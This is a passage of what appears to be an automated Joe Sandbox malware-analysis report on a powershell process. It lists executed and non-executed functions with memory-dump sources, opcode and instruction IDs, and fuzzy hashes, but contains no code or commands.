                                                                                                                                                                                                • Opcode ID: d63868e9d61f7b65443834f70c6f78b63450a8eeaf30770e3101792ec8c08a3b
                                                                                                                                                                                                • Instruction ID: 8c26e43dc7d7b47e5e9daa1a86564bbc5ebabda1ab9b7bb5d656652c41b8040a
                                                                                                                                                                                                • Opcode Fuzzy Hash: d63868e9d61f7b65443834f70c6f78b63450a8eeaf30770e3101792ec8c08a3b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 493115F1B0020EDBCB248F658A85B6A7BF2AF81344F4C80A5DD449B251E731DAC2C7E1
                                                                                                                                                                                                Function 034333F0 Relevance: .1, Instructions: 107COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000004.00000002.1964001360.0000000003430000.00000040.00000800.00020000.00000000.sdmp, Offset: 03430000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_3430000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 4f810772ade12ff573eac09b10b8d3a465281047384bbfa5d8398ff2584085cf
                                                                                                                                                                                                • Instruction ID: 561bd6e0a7750bf5a1c097d47d3eb5eec02a431a8380a337c753968ee64238b0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f810772ade12ff573eac09b10b8d3a465281047384bbfa5d8398ff2584085cf
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C416C78A005059FCB0ACF59C594AAEFBB1FF49310B25829AD815AB361C736FD50CFA4
                                                                                                                                                                                                Function 03432A61 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000004.00000002.1964001360.0000000003430000.00000040.00000800.00020000.00000000.sdmp, Offset: 03430000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_3430000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 0a5f6a84972b3d1635fe6836ce826a488fc153174c36288b3b18e4cce9b13534
                                                                                                                                                                                                • Instruction ID: 396f114026a384a10da2e6ed8bf29581a19b24d4c089c08aa4dd5fc3cd0a2d90
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0a5f6a84972b3d1635fe6836ce826a488fc153174c36288b3b18e4cce9b13534
                                                                                                                                                                                                • Instruction Fuzzy Hash: 90416D74A093859FCB12CF68C8949A9BFB1FF0E21076985D7D448EB362C334AC45CBA5
                                                                                                                                                                                                Function 03433400 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000004.00000002.1964001360.0000000003430000.00000040.00000800.00020000.00000000.sdmp, Offset: 03430000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_3430000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 3cc97caf92441b165d10b70a9958dfca2bf79046984df5105d726842ddc5ab6f
                                                                                                                                                                                                • Instruction ID: 25804abcc35b44560fcf0e22ae91788461afd9ed298a765a0db1dcdeddb016d8
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3cc97caf92441b165d10b70a9958dfca2bf79046984df5105d726842ddc5ab6f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 10413A78A005159FCB0ACF49C594AAEF7B1FF48310B25829AD915AB364C736FD50CBA4
                                                                                                                                                                                                Function 03432AB0 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000004.00000002.1964001360.0000000003430000.00000040.00000800.00020000.00000000.sdmp, Offset: 03430000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_3430000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 55c5ecd458bba259986f6023db5d1f9ac48c9e78887ee1ca1c9d80e59bdb20b6
                                                                                                                                                                                                • Instruction ID: 153f92a32ac37d30439ec02227ddcff27b13c19c130da534cf8e5eb27d978f0f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 55c5ecd458bba259986f6023db5d1f9ac48c9e78887ee1ca1c9d80e59bdb20b6
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E21F8B4A006199FCB01CF5DC980AAAFBB1FF4D310B248596D519EB361C735ED41CBA0
                                                                                                                                                                                                Function 034348F1 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000004.00000002.1964001360.0000000003430000.00000040.00000800.00020000.00000000.sdmp, Offset: 03430000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_3430000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 64c57dfd0bf5bf1daf6d0880d782ca7cd5be8d956164ba382b846c8833f15f21
                                                                                                                                                                                                • Instruction ID: e4d28e1caf5db5e53fa550b52fb304aa69e355352fc8f13d57b3b77620b23d7a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 64c57dfd0bf5bf1daf6d0880d782ca7cd5be8d956164ba382b846c8833f15f21
                                                                                                                                                                                                • Instruction Fuzzy Hash: C221FC78A042598FCB04CFADD4809AEFBB5FF89310B148196D559AB352C735EC41CFA4
                                                                                                                                                                                                Function 0336D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000004.00000002.1963614973.000000000336D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0336D000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_336d000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 23dfaa38b373122be68eb995d2c4e31404af5c97f5d04c6e57685e90a6654313
                                                                                                                                                                                                • Instruction ID: d951631a944a9fae7928425c726948e479bd17df68e9dbeef69152b7e94be335
                                                                                                                                                                                                • Opcode Fuzzy Hash: 23dfaa38b373122be68eb995d2c4e31404af5c97f5d04c6e57685e90a6654313
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C01F271208B409EEB20CA29CCC4B66FFDCDF91325F1CC45AEC480B68AC67C9845C6B1
                                                                                                                                                                                                Function 0336D006 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000004.00000002.1963614973.000000000336D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0336D000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_336d000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 66c4946f67421f7b0cbe04e002c13d71406b2d7f0b42affc3adeb7bed88f2c1b
                                                                                                                                                                                                • Instruction ID: e8971738922fb32d97296ae313760bc4f516fc4111cfc4f3a2fbf56ca276ac6e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 66c4946f67421f7b0cbe04e002c13d71406b2d7f0b42affc3adeb7bed88f2c1b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E012D7210E7C09ED7128B258C94B52BFB8DF53224F1DC0CBD8888F2A7C2695848C772

                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                Function 07C43D70 Relevance: 10.5, Strings: 8, Instructions: 465COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000004.00000002.1972379608.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7c40000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$$^q$$^q
                                                                                                                                                                                                • API String ID: 0-517161784
                                                                                                                                                                                                • Opcode ID: 86f5d77e98812d588cc29192d8eb52a3255ae87672253b3efa67d3dcbc99dc03
                                                                                                                                                                                                • Instruction ID: 1a687343a0e6fda868993da25d960988b34574cfc62c1fb41d87bd2b687091b5
                                                                                                                                                                                                • Opcode Fuzzy Hash: 86f5d77e98812d588cc29192d8eb52a3255ae87672253b3efa67d3dcbc99dc03
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0FE129B1B04296CFCB28DB69849576ABBF2AFC5311F34C4AAC405DF255DB31CA81C792
                                                                                                                                                                                                Function 07C42188 Relevance: 9.2, Strings: 7, Instructions: 464COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000004.00000002.1972379608.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7c40000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: 0U^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q
                                                                                                                                                                                                • API String ID: 0-3781177191
                                                                                                                                                                                                • Opcode ID: aee689ef27496d8279fb1776934f665055eb8016d8708df902618730c4c4189b
                                                                                                                                                                                                • Instruction ID: 7c98e87d60d2da98d7ba4b46da1d22588b37f49797bcb482c36ecd97751309b4
                                                                                                                                                                                                • Opcode Fuzzy Hash: aee689ef27496d8279fb1776934f665055eb8016d8708df902618730c4c4189b
                                                                                                                                                                                                • Instruction Fuzzy Hash: AEE126B1B002158FCB28DB69848676ABBF2FFC5321F15C46AE509DF251DA31D982C7A1
                                                                                                                                                                                                Function 07C408A0 Relevance: 9.1, Strings: 7, Instructions: 316COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000004.00000002.1972379608.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7c40000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                                                                                                                                                                • API String ID: 0-1608119003
                                                                                                                                                                                                • Opcode ID: 3501e710f5ee73e35686068affd278d2e608c0b1639479b8a3593cafc4d12362
                                                                                                                                                                                                • Instruction ID: 5799f2189e94bd75c020422ed470df7ea6531460503b457a71674d564798d89d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3501e710f5ee73e35686068affd278d2e608c0b1639479b8a3593cafc4d12362
                                                                                                                                                                                                • Instruction Fuzzy Hash: 54A179B27843168FD7259A79885077BBBF19FC6211F1884EBDA45CF352DA31C981C3A1
                                                                                                                                                                                                Function 07C40E28 Relevance: 8.0, Strings: 6, Instructions: 476COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000004.00000002.1972379608.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7c40000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: 4'^q$4'^q$tP^q$tP^q$tP^q$tP^q
                                                                                                                                                                                                • API String ID: 0-4192453120
                                                                                                                                                                                                • Opcode ID: 6399c686ec8ab04f2aa12f57914ca73885999d12a6f6dfea6262b39476ee1c2d
                                                                                                                                                                                                • Instruction ID: f495c638470c394c6724db9a9456401f881faf1aba5c0c3b68cfba769aa84e2b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6399c686ec8ab04f2aa12f57914ca73885999d12a6f6dfea6262b39476ee1c2d
                                                                                                                                                                                                • Instruction Fuzzy Hash: B7F17AB1B0434ADFCB209B69844576ABBF2AF86311F18C0BAD589DF241DB31C9C5C791
                                                                                                                                                                                                Function 07C437C0 Relevance: 8.0, Strings: 6, Instructions: 450COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000004.00000002.1972379608.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7c40000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q
                                                                                                                                                                                                • API String ID: 0-445857065
                                                                                                                                                                                                • Opcode ID: ee3540eecb7aacfef3d39a0f48c7fbe74270678eee6d6ef59fd8c8ec377f1834
                                                                                                                                                                                                • Instruction ID: 0e5cf8f449c6b744e05430e1469f25fe181443f4799499c17a4dc51d7cef7406
                                                                                                                                                                                                • Opcode Fuzzy Hash: ee3540eecb7aacfef3d39a0f48c7fbe74270678eee6d6ef59fd8c8ec377f1834
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4AE199B17043968FC7259BA8885136ABBF2AFC6211F1484BBC905EF291DB31DD41C7A2
                                                                                                                                                                                                Function 07C414E8 Relevance: 6.4, Strings: 5, Instructions: 184COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000004.00000002.1972379608.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7c40000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                                                                                                                • API String ID: 0-3272787073
                                                                                                                                                                                                • Opcode ID: b469e7a655b65de9aa14cdcd3442f5a760561b86d07bb810cf7817232a4d0b7a
                                                                                                                                                                                                • Instruction ID: 98c80381e4042211212b7443ce9dce7b292982e5d5eaed05d8a58b2f6e0905dd
                                                                                                                                                                                                • Opcode Fuzzy Hash: b469e7a655b65de9aa14cdcd3442f5a760561b86d07bb810cf7817232a4d0b7a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 56513AB1B0431E9FCB259B6D84413A6BBF2AFC6311F1C846BD496CB251DA31C9C2C791
                                                                                                                                                                                                Function 07C43518 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000004.00000002.1972379608.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7c40000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                                                • API String ID: 0-2125118731
                                                                                                                                                                                                • Opcode ID: 0e27bc9b94c6809946b3391c73c58d06741b3a9aa32fd32c4d1ec9b70fe91491
                                                                                                                                                                                                • Instruction ID: b8c57423e34d6722d0c526d3e504b7ba7b651bd5e83543c165e9b21f3c32579e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e27bc9b94c6809946b3391c73c58d06741b3a9aa32fd32c4d1ec9b70fe91491
                                                                                                                                                                                                • Instruction Fuzzy Hash: B92168F17107866BDB38667E8841B33BFD65BC0725F24842AD909EF281DE31D945C361
                                                                                                                                                                                                Function 07C40570 Relevance: 5.0, Strings: 4, Instructions: 45COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000004.00000002.1972379608.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7c40000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                                                                                • API String ID: 0-2049395529
                                                                                                                                                                                                • Opcode ID: 1e22f77f502c89bee57421f8ec314afcb220409519bda708e16ab50b128e8c7c
                                                                                                                                                                                                • Instruction ID: f92d58238efea3668a03650ea7379fea486b45f7f00714a3b72f2bb74bd76523
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1e22f77f502c89bee57421f8ec314afcb220409519bda708e16ab50b128e8c7c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 13017B7074D38A8FC72A976C58242186BF1EF8290072A40EBC142DF297DE24CC8AC396